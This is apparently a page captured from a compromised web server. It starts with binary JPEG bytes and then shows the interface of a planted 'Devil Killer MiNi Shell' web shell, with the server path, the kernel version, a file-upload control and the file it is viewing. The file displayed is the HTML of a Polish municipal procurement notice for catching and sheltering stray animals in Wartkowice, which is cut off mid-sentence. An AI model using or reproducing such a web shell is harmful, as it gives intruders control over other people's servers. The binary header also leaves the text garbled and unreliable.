JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220105/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220105/0000727201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Odławianie bezdomnych zwierząt z terenu gminy Wartkowice oraz zapewnienie im opieki i miejsca w schronisku dla bezdomnych zwierząt” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA WARTKOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730934364</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">STARY GOSTKÓW 3D</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wartkowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">99-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">43/6785105</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@wartkowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.wartkowice.biuletyn.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Odławianie bezdomnych zwierząt z terenu gminy Wartkowice oraz zapewnienie im opieki i miejsca w schronisku dla bezdomnych zwierząt” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1b815f59-6c66-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00007272</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002272/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 „Odławianie bezdomnych zwierząt z terenu gminy Wartkowice oraz zapewnienie im opieki i miejsca w schronisku dla bezdomnych zwierząt”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortal,<br/>który dostępny jest pod adresem https://miniportal.uzp.gov.pl , ePUAPu https://epuap.gov.pl/wps/portal<br/>oraz poczty elektronicznej.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma wtedy dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert) -<br/>ROZDZIAŁ X, pkt 7 SWZ ZP.271.01.2022</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, dalej „RODO”) w zw. z art.<br/>19 ust. 1 p.z.p., Gmina Wartkowice informuje, że:<br/>1.1. Administratorem Pani/Pana danych osobowych jest Gmina Wartkowice, Stary Gostków 3D, 99-220Wartkowice, reprezentowana przez Wójta Gminy; tel. 43 / 678-51-05;<br/>1.2. Gmina Wartkowice wyznaczyła Inspektora Ochrony Danych, Magdaleną Kuszmider, kontakt<br/>pisemny za pomocą poczty tradycyjnej na adres: Urząd Gminy Wartkowice, Starym Gostkowie 3D, 99-<br/>220 Wartkowice; e-mail: kontakt@iszd.pl ;<br/>1.3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego, nr sprawy ZP.271.08.2021.<br/>1.4. Podanie przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym<br/>wmprzepisach p.z.p. związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>1.5. Konsekwencje niepodania danych osobowych wynikają z p.z.p..<br/>1.6. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępnionazostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 3 oraz 4 p.z.p., przy czym<br/>udostepnieniu nie podlegają dane osobowe, o których mowa w art. 9 ust. 1 RODO, zebrane w toku<br/>postępowania o udzielenie zamówienia.<br/>1.7. Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 p.z.p. przez okres co<br/>najmniej 4 lat liczonych od dnia zakończenia postępowania o udzielenie zamówienia publicznego albo<br/>do upływu terminu możliwości kontroli projektu współfinansowanego lub finansowanego ze środków<br/>Unii Europejskiej albo jego trwałości takie projektu bądź innych umów czy zobowiązań wynikających z<br/>realizowanych projektów.<br/>1.8. Posiada Pani/Pan prawo do:<br/>1.8.1. na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>1.8.2. na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>1.8.3. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych,<br/>1.8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>- szczegóły ROZDZIAŁ XXV SWZ ZP.271.01.2022</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.Nie przysługuje Pani/Panu prawo do:<br/>1.1. prawo do usunięcia danych osobowych w zw. z art. 17 ust. 3 lit. b), d) lub e) RODO,<br/>1.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>1.3. prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) w zw. z art. 21 RODO.<br/>- szczegóły ROZDZIAŁ XXV SWZ ZP.271.01.2022</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.01.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa w zakresie odławiania bezdomnych zwierząt z terenu<br/>gminy Wartkowice oraz zapewnienie im opieki i miejsca w schronisku dla bezdomnych zwierząt<br/>polegająca w szczególności na :<br/>1.1. przejęciu pod opiekę psów utrzymywanych aktualnie w schronisku w Wojtyszkach w w terminie 14 dni od dnia podpisania umowy - w imieniu i na rzecz Gminy Wartkowice (na dzień 31 grudnia 2021 rok stan ilościowy bezdomnych psów przebywających w schronisku wynosi 22 sztuk) – zapis nie dotyczy sytuacji kiedy w wyniku przeprowadzonej procedury przetargowej wyłoniony zostanie podmiot świadczący usługę w okresie bieżącym,<br/>1.2. odławianiu i transporcie bezdomnych zwierząt z terenu gminy Wartkowice do miejsca ich<br/>przebywania tj.: schroniska dla bezdomnych zwierząt przy użyciu urządzeń i środków, które nie<br/>powodują zagrożenia dla życia i zdrowia zwierząt ani też nie zadają im cierpienia, ponadto nie<br/>stwarzają zagrożenia dla bezpieczeństwa i porządku publicznego, przy czym podjęcie czynności<br/>odławiania zwierzęcia winno nastąpić w ciągu 4 godzin od otrzymania telefonicznego zgłoszenia<br/>od Zamawiającego, natomiast w przypadku zagrożenia życia lub zdrowia mieszkańców przed<br/>atakami zwierząt w możliwie najkrótszym czasie nie przekraczającym 2 godzin od chwili<br/>zgłoszenia. Za zwierzę zgłoszone przez osoby nieuprawnione oraz dostarczone Wykonawcy<br/>bez zgody Zamawiającego, Zamawiający nie ponosi kosztów związanych z realizacją usługi,<br/>1.3. zapewnieniu opieki bezdomnym zwierzętom z terenu gminy Wartkowice umieszczonym w<br/>schronisku dla bezdomnych zwierząt poprzez:<br/>1.3.1. zapewnienie właściwych pomieszczeń dla zwierząt, które tam będą przebywać,<br/>1.3.2. zapewnienie właściwych warunków ich bytowania,<br/>1.3.3. zapewnienie zwierzętom karmy i wody według obowiązujących norm,<br/>1.3.4. zapewnienie zwierzętom niezbędnej opieki weterynaryjnej w tym piętnastodniowej<br/>kwarantanny, szczepienia obowiązkowe, leczenie, odrobaczenie, odpchlenie,<br/>1.3.5. poddawanie zabiegom sterylizacji i kastracji bezdomnych zwierząt z terenu gminy<br/>Wartkowice z zachowaniem zapisów ustawy z dnia 21 sierpnia 1997 r. o ochronie zwierząt (tj.<br/>Dz.U. z 2020 r. poz. 638),<br/>1.3.6. usypianie ślepych miotów zwierząt przebywających i przybywających do schroniska<br/>zgodnie z obowiązującymi w tym zakresie przepisami prawa,<br/>1.3.7. znakowaniu zwierząt za pomocą mikroczipa i wprowadzanie numeru do bazy danych.<br/>2. Wykonawca zobowiązany będzie utrzymać w całym okresie realizacji usługi ubezpieczenie OC przedsiębiorcy z tytułu prowadzonej działalności<br/>gospodarczej związanej z przedmiotem zamówienia na kwotę co najmniej 300000zł ( słownie: trzysta tysięcy złotych).<br/>3. Wykonawca zobowiązany będzie zawrzeć przed podpisaniem umowy i utrzymać w całym okresie realizacji usługi do zagospodarowania i utylizowania odpadów weterynaryjnych oraz padłych i uśpionych zwierząt zgodnie z obowiązującymi przepisami prawa w zakresie ochrony środowiska i w zakresie gospodarowania odpadami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98380000-0 - Usługi psiarni</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85200000-1 - Usługi weterynaryjne</p> <p class="mb-0">85210000-3 - Ośrodki pielęgnowania zwierząt domowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona oceny tych ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/>LP	NAZWA KRYTERIUM	WAGA (w %)<br/>1	CENA	60<br/>2	TERMIN PŁATNOŚCI FAKTURY	40<br/><br/>2.	Do oceny poszczególnych ofert w zakresie kryterium CENA zostanie zastosowana metoda polegająca na przyznaniu przedstawionej poniżej ilości punktów za zaoferowanie w Formularzu Ofertowym przez Wykonawcę ceny ofertowej za wykonanie przedmiotu zamówienia.<br/>Punktacja w kryterium cena obliczana będzie wg wzoru:<br/><br/>Najniższa cena ofertowa <br/>Cena ofertowa ocenianej oferty x 100 x procentowe znaczenie tego kryterium, tj. 60 %<br/><br/>Wykonawca może otrzymać w ramach niniejszego kryterium maksymalnie 60pkt.<br/><br/>3.	Do oceny poszczególnych ofert w zakresie kryterium TERMIN PŁATNOŚCI FAKTURY zostanie zastosowana metoda polegająca na przyznaniu przedstawionej poniżej ilości punktów za zaoferowanie w Formularzu Ofertowym przez Wykonawcę terminu płatności faktury od daty doręczenia prawidłowo wystawionej faktury Zamawiającemu za wykonanie przedmiotu zamówienia:<br/>Punktacja w kryterium cena obliczana będzie wg wzoru:<br/><br/>Termin płatności faktur oferty badanej<br/>Najdłuższy zaoferowany termin płatności faktur x 100 x procentowe znaczenie tego kryterium, tj. 40 %<br/><br/>Uwaga!<br/>•	Wpływ faktur do Zamawiającego jest ewidencjonowany.<br/>•	Zamawiający wymaga, aby termin płatności faktur wynosił nie mniej niż 14 dni i nie więcej niż 30 dni od daty otrzymania prawidłowo wystawionej faktury.<br/>•	Przedstawienie w ofercie terminu płatności faktury krótszego niż 14 dni lub dłuższego niż 30 dni skutkować będzie odrzuceniem oferty jako nieodpowiadającej treści SWZ – art. 226 ust. 1 pkt.5) ustawy Pzp. <br/><br/>Wykonawca może otrzymać w ramach niniejszego kryterium maksymalnie 40pkt.<br/>4.	Oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów - maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria wynosi 100pkt.<br/>5.	Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia ten sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę najniższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin Płatności Faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie niniejszego zamówienia może ubiegać się Wykonawca, który spełnia<br/>następujące warunki udziału w postępowaniu dotyczące:<br/>1.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spienianie Wykonawca<br/>byłby zobowiązany wykazać w sposób szczególny;<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów :<br/>1.2.1. prowadzi schronisko dla bezdomnych zwierząt zgodnie z Rozporządzeniem Ministra<br/>Rolnictwa i Rozwoju Wsi z dnia 23 czerwca 2004 r. w sprawie szczegółowych wymagań<br/>weterynaryjnych dla prowadzenia schronisk dla zwierząt (Dz. U. 2004r. nr 158, poz. 1657);<br/>i/lub<br/>posiada statut organizacji społecznej potwierdzający, że jej celem statutowym jest ochrona<br/>zwierząt, w tym m.in. prowadzenie schronisk dla bezdomnych zwierząt oraz zapewnianie<br/>ochrony przed bezdomnymi zwierzętami, oraz że ma ona prawo prowadzić działalność<br/>zarobkową – warunek dotyczy organizacji społecznych,<br/>1.2.2. posiada aktualną decyzję właściwego miejscowo dla siedziby schroniska Wójta Gminy/<br/>Burmistrza/ Prezydenta Miasta w zakresie prowadzenia schroniska dla zwierząt;<br/>1.2.3. posiada aktualną decyzję Powiatowego Lekarza Weterynarii właściwego miejscowo dla<br/>Wykonawcy o objęciu nadzorem inspekcji weterynaryjnej, wprowadzeniu do Rejestru<br/>Powiatowego Lekarza Weterynarii i nadaniu weterynaryjnego numeru identyfikacyjnego;<br/>1.2.4. posiada aktualne zezwolenie na prowadzenie działalności w zakresie ochrony przed<br/>bezdomnymi zwierzętami (odławiania) na terenie gminy Wartkowice wydane przez Wójta;<br/>1.2.5. posiada aktualną decyzję Powiatowego Lekarza Weterynarii dotycząca spełniania<br/>wymagań weterynaryjnych dla działalności w zakresie transportu zwierząt wykonywanego w<br/>związku z prowadzeniem innej działalności gospodarczej;<br/>1.2.6. posiada aktualny dokument zezwolenia (licencji) dla przewoźnika wydane przez<br/>Powiatowego Lekarza Weterynarii właściwego miejscowo dla Wykonawcy.<br/>1.3. sytuacji ekonomicznej lub finansowej:<br/>jest ubezpieczony od odpowiedzialności cywilnej w związku z prowadzoną działalnością<br/>związaną z przedmiotem zamówienia na sumę gwarancyjną w kwocie co najmniej 300000PLN<br/>(słownie: trzysta tysięcy złotych).<br/>Dla potrzeb oceny spełniania warunku określonego powyżej, jeśli wartości zostaną podane w<br/>walutach innych niż PLN, Zamawiający przyjmie średni kurs PLN do tej waluty podawany przez<br/>NBP (Tabela A kursów średnich walut obcych) na dzień opublikowania ogłoszenia o zamówieniu.<br/>1.4. zdolności technicznej lub zawodowej:<br/>Zamawiający uzna ww. warunek za spełniony. jeżeli Wykonawca wykaże, że:<br/>1.4.1. w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wykonał bądź nadal wykonuje co najmniej<br/>dwie usługi polegające na odławianiu bezdomnych zwierząt i zapewnieniu im opieki w schronisku o wartości co najmniej 100 000,00 zł;<br/>1.4.2. dysponuje atestowanym sprzętem do wyłapywania i obezwładniania bezdomnych<br/>zwierząt, niezagrażającym ich życiu i zdrowiu, tj.:<br/>1.4.2.1. aplikatorem pneumatycznym - min. 1 szt.,–<br/>1.4.2.2. chwytakiem automatycznym - min. 1 szt.,<br/>1.4.2.3. siecią weterynaryjną - min. 1 szt.,<br/>1.4.2.4. klatką „żywołapką” - min. 1 szt.<br/>1.4.2.5. czytnikiem do odczytywania numeru mikorchipów w celu identyfikacji zwierząt - min. 1<br/>szt. ;<br/>1.4.3. dysponuje co najmniej dwoma środkami transportu do przewozu posiadającymi aktualną<br/>decyzję Powiatowego Lekarza Weterynarii dotycząca spełniania wymagań weterynaryjnych dla<br/>środka transportu drogowego służącego do transportu zwierząt;<br/>1.4.4. dysponuje co najmniej jedną osobą posiadającą prawo wykonywania zawodu lekarza<br/>weterynarii;<br/>1.4.5. dysponuje co najmniej dwoma osobami posiadającymi aktualną licencję dla kierowców i<br/>osób obsługujących zgodną z art. 17 ust 2 Rozporządzenia Rady (WE) nr 1/2005 z dnia 22 grudnia 2001r.<br/>Przez „jedną usługę” Zamawiający rozumie jedno odpłatne zamówienie /umowę / kontrakt. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 p.z.p., o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (t.j. Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej; Wzór<br/>oświadczenia stanowi Załącznik nr 3 do niniejszej SWZ;<br/>2. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego,<br/>że Wykonawca nie zalega z opłaceniem podatków i opłat, w zakresie art. 109 ust.1 pkt 1 